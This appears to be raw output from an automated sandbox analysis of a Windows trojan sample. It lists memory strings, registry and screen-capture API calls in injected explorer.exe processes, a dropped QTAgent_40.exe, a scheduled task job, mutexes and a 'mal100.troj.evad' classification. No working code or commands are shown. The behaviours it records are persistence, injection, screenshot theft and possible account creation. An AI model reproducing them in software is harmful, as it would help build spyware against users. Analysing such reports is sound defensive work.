          Source: BGUO31BLG4WQAOX9MA4VF71OJ1M.exe, 00000000.00000002.1385998879.0000000006B2B000.00000004.00000020.00020000.00000000.sdmp, comp.exe, 00000002.00000002.1649743130.0000000004D52000.00000004.00000800.00020000.00000000.sdmp, comp.exe, 00000008.00000002.1719433998.0000000004E38000.00000004.00000800.00020000.00000000.sdmp, comp.exe, 0000000A.00000002.1787037841.0000000004472000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2602250692.0000000004F4D000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.1720081684.0000000004D4E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.1788401445.0000000005310000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0O
          Source: BGUO31BLG4WQAOX9MA4VF71OJ1M.exe, 00000000.00000002.1385998879.0000000006B2B000.00000004.00000020.00020000.00000000.sdmp, comp.exe, 00000002.00000002.1649743130.0000000004D52000.00000004.00000800.00020000.00000000.sdmp, comp.exe, 00000008.00000002.1719433998.0000000004E38000.00000004.00000800.00020000.00000000.sdmp, comp.exe, 0000000A.00000002.1787037841.0000000004472000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2602250692.0000000004F4D000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.1720081684.0000000004D4E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.1788401445.0000000005310000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
          Source: BGUO31BLG4WQAOX9MA4VF71OJ1M.exe, 00000000.00000002.1385998879.0000000006B2B000.00000004.00000020.00020000.00000000.sdmp, comp.exe, 00000002.00000002.1649743130.0000000004D52000.00000004.00000800.00020000.00000000.sdmp, comp.exe, 00000008.00000002.1719433998.0000000004E38000.00000004.00000800.00020000.00000000.sdmp, comp.exe, 0000000A.00000002.1787037841.0000000004472000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2602250692.0000000004F4D000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.1720081684.0000000004D4E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.1788401445.0000000005310000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://s2.symcb.com0
          Source: BGUO31BLG4WQAOX9MA4VF71OJ1M.exe, 00000000.00000002.1385998879.0000000006B2B000.00000004.00000020.00020000.00000000.sdmp, comp.exe, 00000002.00000002.1649743130.0000000004D52000.00000004.00000800.00020000.00000000.sdmp, comp.exe, 00000008.00000002.1719433998.0000000004E38000.00000004.00000800.00020000.00000000.sdmp, comp.exe, 0000000A.00000002.1787037841.0000000004472000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2602250692.0000000004F4D000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.1720081684.0000000004D4E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.1788401445.0000000005310000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sv.symcb.com/sv.crl0a
          Source: BGUO31BLG4WQAOX9MA4VF71OJ1M.exe, 00000000.00000002.1385998879.0000000006B2B000.00000004.00000020.00020000.00000000.sdmp, comp.exe, 00000002.00000002.1649743130.0000000004D52000.00000004.00000800.00020000.00000000.sdmp, comp.exe, 00000008.00000002.1719433998.0000000004E38000.00000004.00000800.00020000.00000000.sdmp, comp.exe, 0000000A.00000002.1787037841.0000000004472000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2602250692.0000000004F4D000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.1720081684.0000000004D4E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.1788401445.0000000005310000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sv.symcb.com/sv.crt0
          Source: BGUO31BLG4WQAOX9MA4VF71OJ1M.exe, 00000000.00000002.1385998879.0000000006B2B000.00000004.00000020.00020000.00000000.sdmp, comp.exe, 00000002.00000002.1649743130.0000000004D52000.00000004.00000800.00020000.00000000.sdmp, comp.exe, 00000008.00000002.1719433998.0000000004E38000.00000004.00000800.00020000.00000000.sdmp, comp.exe, 0000000A.00000002.1787037841.0000000004472000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2602250692.0000000004F4D000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.1720081684.0000000004D4E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.1788401445.0000000005310000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sv.symcd.com0&
          Source: BGUO31BLG4WQAOX9MA4VF71OJ1M.exe, 00000000.00000002.1385998879.0000000006B2B000.00000004.00000020.00020000.00000000.sdmp, comp.exe, 00000002.00000002.1649743130.0000000004D52000.00000004.00000800.00020000.00000000.sdmp, comp.exe, 00000008.00000002.1719433998.0000000004E38000.00000004.00000800.00020000.00000000.sdmp, comp.exe, 0000000A.00000002.1787037841.0000000004472000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2602250692.0000000004F4D000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.1720081684.0000000004D4E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.1788401445.0000000005310000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
          Source: BGUO31BLG4WQAOX9MA4VF71OJ1M.exe, 00000000.00000002.1385998879.0000000006928000.00000004.00000020.00020000.00000000.sdmp, comp.exe, 00000002.00000002.1649743130.0000000004D09000.00000004.00000800.00020000.00000000.sdmp, comp.exe, 00000008.00000002.1719433998.0000000004DEF000.00000004.00000800.00020000.00000000.sdmp, comp.exe, 0000000A.00000002.1787037841.0000000004429000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2602250692.0000000004F04000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.1720081684.0000000004D05000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.1788401445.00000000052C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.info-zip.org/
          Source: BGUO31BLG4WQAOX9MA4VF71OJ1M.exe, 00000000.00000002.1385998879.0000000006B2B000.00000004.00000020.00020000.00000000.sdmp, comp.exe, 00000002.00000002.1649743130.0000000004D52000.00000004.00000800.00020000.00000000.sdmp, comp.exe, 00000008.00000002.1719433998.0000000004E38000.00000004.00000800.00020000.00000000.sdmp, comp.exe, 0000000A.00000002.1787037841.0000000004472000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2602250692.0000000004F4D000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.1720081684.0000000004D4E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.1788401445.0000000005310000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.symauth.com/cps0(
          Source: BGUO31BLG4WQAOX9MA4VF71OJ1M.exe, 00000000.00000002.1385998879.0000000006B2B000.00000004.00000020.00020000.00000000.sdmp, comp.exe, 00000002.00000002.1649743130.0000000004D52000.00000004.00000800.00020000.00000000.sdmp, comp.exe, 00000008.00000002.1719433998.0000000004E38000.00000004.00000800.00020000.00000000.sdmp, comp.exe, 0000000A.00000002.1787037841.0000000004472000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2602250692.0000000004F4D000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.1720081684.0000000004D4E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.1788401445.0000000005310000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.symauth.com/rpa00
          Source: BGUO31BLG4WQAOX9MA4VF71OJ1M.exe, 00000000.00000002.1385998879.0000000006B2B000.00000004.00000020.00020000.00000000.sdmp, comp.exe, 00000002.00000002.1649743130.0000000004D52000.00000004.00000800.00020000.00000000.sdmp, comp.exe, 00000008.00000002.1719433998.0000000004E38000.00000004.00000800.00020000.00000000.sdmp, comp.exe, 0000000A.00000002.1787037841.0000000004472000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2602250692.0000000004F4D000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.1720081684.0000000004D4E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.1788401445.0000000005310000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.vmware.com/0
          Source: BGUO31BLG4WQAOX9MA4VF71OJ1M.exe, 00000000.00000002.1385998879.0000000006B2B000.00000004.00000020.00020000.00000000.sdmp, comp.exe, 00000002.00000002.1649743130.0000000004D52000.00000004.00000800.00020000.00000000.sdmp, comp.exe, 00000008.00000002.1719433998.0000000004E38000.00000004.00000800.00020000.00000000.sdmp, comp.exe, 0000000A.00000002.1787037841.0000000004472000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2602250692.0000000004F4D000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.1720081684.0000000004D4E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.1788401445.0000000005310000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.vmware.com/0/
          Source: BGUO31BLG4WQAOX9MA4VF71OJ1M.exe, 00000000.00000002.1385998879.0000000006B2B000.00000004.00000020.00020000.00000000.sdmp, comp.exe, 00000002.00000002.1649743130.0000000004D52000.00000004.00000800.00020000.00000000.sdmp, comp.exe, 00000008.00000002.1719433998.0000000004E38000.00000004.00000800.00020000.00000000.sdmp, comp.exe, 0000000A.00000002.1787037841.0000000004472000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2602250692.0000000004F4D000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.1720081684.0000000004D4E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.1788401445.0000000005310000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/cps0%
          Source: BGUO31BLG4WQAOX9MA4VF71OJ1M.exe, 00000000.00000002.1385998879.0000000006B2B000.00000004.00000020.00020000.00000000.sdmp, comp.exe, 00000002.00000002.1649743130.0000000004D52000.00000004.00000800.00020000.00000000.sdmp, comp.exe, 00000008.00000002.1719433998.0000000004E38000.00000004.00000800.00020000.00000000.sdmp, comp.exe, 0000000A.00000002.1787037841.0000000004472000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2602250692.0000000004F4D000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.1720081684.0000000004D4E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.1788401445.0000000005310000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa0
          Source: BGUO31BLG4WQAOX9MA4VF71OJ1M.exeString found in binary or memory: https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-2.4-Build4571/jcl/source/common/Jcl8087.pas
          Source: BGUO31BLG4WQAOX9MA4VF71OJ1M.exeString found in binary or memory: https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-2.4-Build4571/jcl/source/common/JclAnsiStrings.
          Source: BGUO31BLG4WQAOX9MA4VF71OJ1M.exeString found in binary or memory: https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-2.4-Build4571/jcl/source/common/JclBase.pas
          Source: BGUO31BLG4WQAOX9MA4VF71OJ1M.exeString found in binary or memory: https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-2.4-Build4571/jcl/source/common/JclCharsets.pas
          Source: BGUO31BLG4WQAOX9MA4VF71OJ1M.exeString found in binary or memory: https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-2.4-Build4571/jcl/source/common/JclCompression.
          Source: BGUO31BLG4WQAOX9MA4VF71OJ1M.exeString found in binary or memory: https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-2.4-Build4571/jcl/source/common/JclDateTime.pas
          Source: BGUO31BLG4WQAOX9MA4VF71OJ1M.exeString found in binary or memory: https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-2.4-Build4571/jcl/source/common/JclFileUtils.pa
          Source: BGUO31BLG4WQAOX9MA4VF71OJ1M.exeString found in binary or memory: https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-2.4-Build4571/jcl/source/common/JclIniFiles.pas
          Source: BGUO31BLG4WQAOX9MA4VF71OJ1M.exeString found in binary or memory: https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-2.4-Build4571/jcl/source/common/JclLogic.pas
          Source: BGUO31BLG4WQAOX9MA4VF71OJ1M.exeString found in binary or memory: https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-2.4-Build4571/jcl/source/common/JclMath.pas
          Source: BGUO31BLG4WQAOX9MA4VF71OJ1M.exeString found in binary or memory: https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-2.4-Build4571/jcl/source/common/JclMime.pas
          Source: BGUO31BLG4WQAOX9MA4VF71OJ1M.exeString found in binary or memory: https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-2.4-Build4571/jcl/source/common/JclRTTI.pas
          Source: BGUO31BLG4WQAOX9MA4VF71OJ1M.exeString found in binary or memory: https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-2.4-Build4571/jcl/source/common/JclResources.pa
          Source: BGUO31BLG4WQAOX9MA4VF71OJ1M.exeString found in binary or memory: https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-2.4-Build4571/jcl/source/common/JclSimpleXml.pa
          Source: BGUO31BLG4WQAOX9MA4VF71OJ1M.exeString found in binary or memory: https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-2.4-Build4571/jcl/source/common/JclStreams.pas
          Source: BGUO31BLG4WQAOX9MA4VF71OJ1M.exeString found in binary or memory: https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-2.4-Build4571/jcl/source/common/JclStringConver
          Source: BGUO31BLG4WQAOX9MA4VF71OJ1M.exeString found in binary or memory: https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-2.4-Build4571/jcl/source/common/JclStrings.pas
          Source: BGUO31BLG4WQAOX9MA4VF71OJ1M.exeString found in binary or memory: https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-2.4-Build4571/jcl/source/common/JclSynch.pas
          Source: BGUO31BLG4WQAOX9MA4VF71OJ1M.exeString found in binary or memory: https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-2.4-Build4571/jcl/source/common/JclSysInfo.pas
          Source: BGUO31BLG4WQAOX9MA4VF71OJ1M.exeString found in binary or memory: https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-2.4-Build4571/jcl/source/common/JclSysUtils.pas
          Source: BGUO31BLG4WQAOX9MA4VF71OJ1M.exeString found in binary or memory: https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-2.4-Build4571/jcl/source/common/JclUnicode.pas
          Source: BGUO31BLG4WQAOX9MA4VF71OJ1M.exeString found in binary or memory: https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-2.4-Build4571/jcl/source/common/JclUnitVersioni
          Source: BGUO31BLG4WQAOX9MA4VF71OJ1M.exeString found in binary or memory: https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-2.4-Build4571/jcl/source/common/JclWideStrings.
          Source: BGUO31BLG4WQAOX9MA4VF71OJ1M.exeString found in binary or memory: https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-2.4-Build4571/jcl/source/common/bzip2.pas
          Source: BGUO31BLG4WQAOX9MA4VF71OJ1M.exeString found in binary or memory: https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-2.4-Build4571/jcl/source/common/zlibh.pas
          Source: BGUO31BLG4WQAOX9MA4VF71OJ1M.exeString found in binary or memory: https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-2.4-Build4571/jcl/source/windows/JclConsole.pas
          Source: BGUO31BLG4WQAOX9MA4VF71OJ1M.exeString found in binary or memory: https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-2.4-Build4571/jcl/source/windows/JclRegistry.pa
          Source: BGUO31BLG4WQAOX9MA4VF71OJ1M.exeString found in binary or memory: https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-2.4-Build4571/jcl/source/windows/JclSecurity.pa
          Source: BGUO31BLG4WQAOX9MA4VF71OJ1M.exeString found in binary or memory: https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-2.4-Build4571/jcl/source/windows/JclShell.pas
          Source: BGUO31BLG4WQAOX9MA4VF71OJ1M.exeString found in binary or memory: https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-2.4-Build4571/jcl/source/windows/JclWin32.pas
          Source: BGUO31BLG4WQAOX9MA4VF71OJ1M.exeString found in binary or memory: https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-2.4-Build4571/jcl/source/windows/Snmp.pas
          Source: BGUO31BLG4WQAOX9MA4VF71OJ1M.exeString found in binary or memory: https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-2.4-Build4571/jcl/source/windows/sevenzip.pas
          Source: BGUO31BLG4WQAOX9MA4VF71OJ1M.exe, 00000000.00000002.1385998879.0000000006B2B000.00000004.00000020.00020000.00000000.sdmp, comp.exe, 00000002.00000002.1649743130.0000000004D52000.00000004.00000800.00020000.00000000.sdmp, comp.exe, 00000008.00000002.1719433998.0000000004E38000.00000004.00000800.00020000.00000000.sdmp, comp.exe, 0000000A.00000002.1787037841.0000000004472000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2602250692.0000000004F4D000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.1720081684.0000000004D4E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.1788401445.0000000005310000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_02EE61F0 Sleep,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,RegOpenKeyExA,RegSetValueExA,RegCloseKey,RegOpenKeyExA,RegSetValueExA,RegCloseKey,RegOpenKeyExA,RegQueryInfoKeyW,RegEnumValueA,RegCloseKey,GdiplusStartup,GetDC,RegGetValueA,RegGetValueA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,RegGetValueA,GetSystemMetrics,GetSystemMetrics,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GdipCreateBitmapFromHBITMAP,GdipGetImageEncodersSize,GdipGetImageEncoders,GdipSaveImageToFile,SelectObject,DeleteObject,DeleteObject,DeleteObject,ReleaseDC,GdipDisposeImage,GdiplusShutdown,GetUserNameA,LookupAccountNameA,GetSidIdentifierAuthority,GetSidSubAuthorityCount,GetSidSubAuthority,GetSidSubAuthority,12_2_02EE61F0
          Source: C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exeCode function: 0_2_0063251D NtQuerySystemInformation,0_2_0063251D
          Source: C:\Windows\SysWOW64\comp.exeFile created: C:\Windows\Tasks\ServiceHub Controller.jobJump to behavior
          Source: C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exeCode function: 0_2_006307390_2_00630739
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_02EE61F012_2_02EE61F0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_02EEB70012_2_02EEB700
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_02F5200012_2_02F52000
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_02F1C46712_2_02F1C467
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_02F1293012_2_02F12930
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_02EE4EF012_2_02EE4EF0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_02F1CC0912_2_02F1CC09
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_02F0F3EB12_2_02F0F3EB
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_02EE51A012_2_02EE51A0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_02F2167912_2_02F21679
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_02F0B4B012_2_02F0B4B0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_02EE545012_2_02EE5450
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_02F25A7612_2_02F25A76
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_02F25B9612_2_02F25B96
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_02F57E2D12_2_02F57E2D
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_02F23DE912_2_02F23DE9
          Source: C:\Windows\SysWOW64\explorer.exeCode function: String function: 02F03F40 appears 136 times
          Source: C:\Windows\SysWOW64\explorer.exeCode function: String function: 02F0A560 appears 56 times
          Source: C:\Windows\SysWOW64\explorer.exeCode function: String function: 02F09D11 appears 60 times
          Source: C:\Windows\SysWOW64\explorer.exeCode function: String function: 02F03030 appears 53 times
          Source: BGUO31BLG4WQAOX9MA4VF71OJ1M.exeStatic PE information: invalid certificate
          Source: BGUO31BLG4WQAOX9MA4VF71OJ1M.exe, 00000000.00000002.1384464950.0000000006718000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs BGUO31BLG4WQAOX9MA4VF71OJ1M.exe
          Source: BGUO31BLG4WQAOX9MA4VF71OJ1M.exe, 00000000.00000000.1349110939.00000000009E2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamenode.exe* vs BGUO31BLG4WQAOX9MA4VF71OJ1M.exe
          Source: BGUO31BLG4WQAOX9MA4VF71OJ1M.exe, 00000000.00000002.1389532302.00000000074DD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs BGUO31BLG4WQAOX9MA4VF71OJ1M.exe
          Source: BGUO31BLG4WQAOX9MA4VF71OJ1M.exe, 00000000.00000002.1385998879.0000000006B2B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamezip.exe( vs BGUO31BLG4WQAOX9MA4VF71OJ1M.exe
          Source: BGUO31BLG4WQAOX9MA4VF71OJ1M.exe, 00000000.00000000.1348154278.000000000041B000.00000020.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilename vs BGUO31BLG4WQAOX9MA4VF71OJ1M.exe
          Source: BGUO31BLG4WQAOX9MA4VF71OJ1M.exe, 00000000.00000000.1348154278.000000000041B000.00000020.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFileName vs BGUO31BLG4WQAOX9MA4VF71OJ1M.exe
          Source: BGUO31BLG4WQAOX9MA4VF71OJ1M.exe, 00000000.00000002.1376105942.00000000056A7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs BGUO31BLG4WQAOX9MA4VF71OJ1M.exe
          Source: BGUO31BLG4WQAOX9MA4VF71OJ1M.exe, 00000000.00000002.1376105942.00000000056A7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFileName vs BGUO31BLG4WQAOX9MA4VF71OJ1M.exe
          Source: BGUO31BLG4WQAOX9MA4VF71OJ1M.exe, 00000000.00000002.1376105942.00000000056A7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamenode.exe* vs BGUO31BLG4WQAOX9MA4VF71OJ1M.exe
          Source: BGUO31BLG4WQAOX9MA4VF71OJ1M.exeBinary or memory string: OriginalFilename vs BGUO31BLG4WQAOX9MA4VF71OJ1M.exe
          Source: BGUO31BLG4WQAOX9MA4VF71OJ1M.exeBinary or memory string: OriginalFileName vs BGUO31BLG4WQAOX9MA4VF71OJ1M.exe
          Source: BGUO31BLG4WQAOX9MA4VF71OJ1M.exeBinary or memory string: OriginalFilenamenode.exe* vs BGUO31BLG4WQAOX9MA4VF71OJ1M.exe
          Source: BGUO31BLG4WQAOX9MA4VF71OJ1M.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
          Source: classification engineClassification label: mal100.troj.evad.winEXE@18/10@37/1
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_02EEE8D0 GetUserNameA,CoInitialize,CoCreateInstance,CoUninitialize,CoUninitialize,CoUninitialize,GetLocalTime,CoUninitialize,12_2_02EEE8D0
          Source: C:\Windows\SysWOW64\comp.exeFile created: C:\Users\user\AppData\Roaming\TlsServerJump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeMutant created: \Sessions\1\BaseNamedObjects\f5a43204a66445ad0e09c0db80eb910b
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5644:120:WilError_03
          Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exeMutant created: \Sessions\1\BaseNamedObjects\MutexNPA_UnitVersioning_1820
          Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exeMutant created: \Sessions\1\BaseNamedObjects\MutexNPA_UnitVersioning_3632
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1696:120:WilError_03
          Source: C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exeMutant created: \Sessions\1\BaseNamedObjects\MutexNPA_UnitVersioning_6072
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3420:120:WilError_03
          Source: C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exeFile created: C:\Users\user\AppData\Local\Temp\d2d22b7aJump to behavior
          Source: Yara matchFile source: BGUO31BLG4WQAOX9MA4VF71OJ1M.exe, type: SAMPLE
          Source: Yara matchFile source: 0.0.BGUO31BLG4WQAOX9MA4VF71OJ1M.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000000.00000000.1348154278.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1376105942.000000000568C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: C:\Windows\SysWOW64\comp.exeProcess created: C:\Windows\SysWOW64\explorer.exe
          Source: C:\Windows\SysWOW64\comp.exeProcess created: C:\Windows\SysWOW64\explorer.exe
          Source: C:\Windows\SysWOW64\comp.exeProcess created: C:\Windows\SysWOW64\explorer.exe
          Source: C:\Windows\SysWOW64\comp.exeProcess created: C:\Windows\SysWOW64\explorer.exeJump to behavior
          Source: C:\Windows\SysWOW64\comp.exeProcess created: C:\Windows\SysWOW64\explorer.exeJump to behavior
          Source: C:\Windows\SysWOW64\comp.exeProcess created: C:\Windows\SysWOW64\explorer.exeJump to behavior
          Source: C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
          Source: C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
          Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
          Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
          Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
          Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
          Source: C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: BGUO31BLG4WQAOX9MA4VF71OJ1M.exeReversingLabs: Detection: 13%
          Source: explorer.exeString found in binary or memory: " /add
          Source: explorer.exeString found in binary or memory: " /add /y
          Source: BGUO31BLG4WQAOX9MA4VF71OJ1M.exeString found in binary or memory: FILENAME-START
          Source: BGUO31BLG4WQAOX9MA4VF71OJ1M.exeString found in binary or memory: FILENAME-STOP
          Source: BGUO31BLG4WQAOX9MA4VF71OJ1M.exeString found in binary or memory: FILESIZE-START
          Source: BGUO31BLG4WQAOX9MA4VF71OJ1M.exeString found in binary or memory: FILESIZE-STOP
          Source: BGUO31BLG4WQAOX9MA4VF71OJ1M.exeString found in binary or memory: FILEPACKEDSIZE-START
          Source: BGUO31BLG4WQAOX9MA4VF71OJ1M.exeString found in binary or memory: FILEPACKEDSIZE-STOP
